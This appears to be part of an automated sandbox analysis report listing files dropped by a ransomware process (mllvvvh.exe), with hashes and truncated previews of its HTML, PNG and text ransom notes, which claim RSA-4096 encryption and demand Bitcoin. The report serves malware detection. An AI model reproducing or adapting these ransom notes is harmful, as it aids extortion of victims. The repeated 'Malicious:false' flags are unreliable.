                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c687c4\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c687c4\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c687c4\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c693d9\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c693d9\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c693d9\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c64e74\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c64e74\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c64e74\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c668a3\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c668a3\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_10.0.17134.1_59c14d4512be5b58e3be16cb2633ba5cb7a7ee0_00000000_15c668a3\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
